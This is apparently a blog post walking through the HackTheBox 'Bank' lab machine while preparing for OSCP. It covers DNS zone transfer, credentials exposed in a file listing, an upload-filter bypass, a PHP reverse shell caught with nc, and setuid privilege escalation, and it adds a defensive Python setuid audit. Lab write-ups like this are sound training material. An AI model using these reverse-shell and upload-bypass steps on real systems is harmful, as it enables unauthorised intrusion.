Hello all,
Some quick updates: I decided to schedule my OSCP for early October to give myself enough time to run through some more boxes, then move over to Proving Grounds on OffSec's platform.
Now let's jump right in!!
Command:
nmap -sC -sV -T4 -oN nmap.txt 10.10.10.29
- -sC = Default Scripts
- -sV = Probe open ports to determine service/version info
- -T4 = Timing template (0-5; higher is faster)
- -oN = Save normal output to a file
Ports Open:
- 22 SSH OpenSSH 6.6.1p1
- 53 ISC Bind 9.0.5-3ubuntu0
- 80 HTTP Apache HTTPD 2.4.7
Let's run a quick Vulnerability Scan to see what we can find.
Command:
nmap --script vuln -T4 -oN vuln.txt 10.10.10.29
I see a DoS here, but that doesn't really help us since we want RCE on the box :-).
I am going to head over to the site to see what I find there...
Something I did while on the site was check out the source and some of the directories listed, but nothing special stuck out to me.
I am going to run Dirb to see if there are any hidden directories here.
Both of these bring up a Forbidden screen.
Let's now try using Gobuster.
Command:
gobuster dir -e -u http://10.10.10.29 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
Since port 53 is open, I am going to check out the DNS records.
Command:
nslookup
127.0.0.1
10.10.10.29
bank.htb
Notice that the reverse lookup of the IP fails, but looking up bank.htb returns the addresses.
Command:
dig axfr @10.10.10.29
As we can see, not many hits without naming the zone, so let's specify it.
Command:
dig axfr bank.htb @10.10.10.29
I am going to edit /etc/hosts and /etc/resolv.conf.
Add this line to /etc/hosts:
10.10.10.29 bank.htb
Then point the resolver at the box:
nano /etc/resolv.conf
nameserver 10.10.10.29
Let's try and re-run GoBuster!
Command:
gobuster dir -e -u http://10.10.10.29 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
After making those quick additions we get a lot more hits, so let's go check them out.
Clicking on the Parent Directory brings up a login screen asking for an Email and Password. I tried some dummy emails and common enumeration, but it didn't work.
Now I am going to check out the Balance-Transfer directory to see if there is anything interesting there.
Each of these looks like a specific user account, with a hashed email and password and the account balance. Going down the list, each link provides a different account.
One thing we will do is sort by size to see if there are any differences.
After doing so we see a .acc file of size 257 that stands out. Open it and let's take a look.
Here we can see there is unhashed (plaintext) account information, such as:
- Email = chris@bank.htb
- Password = !##HTBB4nkP4ssw0rd!##
Now head back over to the login screen again and put in the creds we just found.
Click the Support link and it will bring up a way for the current user to submit files.
On my Kali machine I created a test file to see whether uploads work.
Command:
touch test.php
Now try to upload it through the site.
Change it from a .php file to a .jpg file.
So I did some quick Google-fu and I didn't see any JPG reverse shells. But when I inspected the page I came across this line of text.
So let's grab a PHP reverse shell and update the code to hopefully get a shell.
Command:
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
nano php-reverse-shell.php
Change the IP to your tun0 address and set the port.
chmod +x php-reverse-shell.php
Now we are going to rename the .php file to a .htb file.
Command:
mv php-reverse-shell.php shell.htb
Now let's re-upload this to the site, with a listener waiting:
Command:
nc -nvlp 1234
Give it a few seconds then you should get access!
Now let's upgrade the shell using the script at the following link.
Command:
python -c 'import pty; pty.spawn("/bin/bash")'
Command:
whoami
Priv Esc
Command:
find / -perm -4000 2>/dev/null
The emergency file stands out: it is setuid, so it runs with its owner's permissions rather than ours.
Command:
cd /var/htb/bin
ls
./emergency
whoami
Now locate the user and root .txt flags.
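As an added example (not from the original post), here is what the find / -perm -4000 step is testing, written out in Python from the defender's side: the three -perm forms as bit tests on st_mode, plus an audit that flags setuid binaries missing from a known-good baseline. The sample listing and the baseline are constructed; only /var/htb/bin/emergency is a path from the box.

```python
import os
import stat
from typing import Iterable, List, NamedTuple, Set


class Entry(NamedTuple):
    path: str
    mode: int  # st_mode as returned by os.lstat(): file-type bits + permission bits


# find's three -perm forms, written out as bit tests on st_mode.
def perm_all(mode: int, bits: int) -> bool:
    """find -perm -MODE: every bit in MODE is set; other bits don't matter."""
    return (mode & bits) == bits


def perm_any(mode: int, bits: int) -> bool:
    """find -perm /MODE: at least one bit in MODE is set."""
    return (mode & bits) != 0


def perm_exact(mode: int, bits: int) -> bool:
    """find -perm MODE: the permission bits equal MODE exactly."""
    return stat.S_IMODE(mode) == bits


def find_setuid(entries: Iterable[Entry]) -> List[str]:
    """Equivalent of `find / -type f -perm -4000`: regular files with setuid set."""
    return [e.path for e in entries if stat.S_ISREG(e.mode) and perm_all(e.mode, stat.S_ISUID)]


def unexpected_setuid(entries: Iterable[Entry], baseline: Set[str]) -> List[str]:
    """Setuid files not on the known-good baseline; these are the ones to investigate."""
    return sorted(set(find_setuid(entries)) - baseline)


def walk_filesystem(root: str = "/") -> Iterable[Entry]:
    """Live listing via os.lstat; unreadable entries are skipped, like 2>/dev/null."""
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                yield Entry(path, os.lstat(path).st_mode)
            except OSError:
                continue


# Constructed sample listing (not a real host); modes include the file-type bits.
SAMPLE = [
    Entry("/usr/bin/passwd", stat.S_IFREG | 0o4755),
    Entry("/usr/bin/sudo", stat.S_IFREG | 0o4755),
    Entry("/usr/bin/wall", stat.S_IFREG | 0o2755),  # setgid only, not setuid
    Entry("/bin/ls", stat.S_IFREG | 0o755),
    Entry("/var/htb/bin/emergency", stat.S_IFREG | 0o4755),  # the binary from the box
]
# Constructed baseline of setuid binaries the distro is expected to ship.
BASELINE = {"/usr/bin/passwd", "/usr/bin/sudo"}
REPORT = unexpected_setuid(SAMPLE, BASELINE)  # -> ['/var/htb/bin/emergency']
```

For a live audit, pass walk_filesystem() in place of SAMPLE and a baseline generated from a freshly installed reference image.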
Top comments (1)
Can you explain more about the find perm command? What are we trying to do?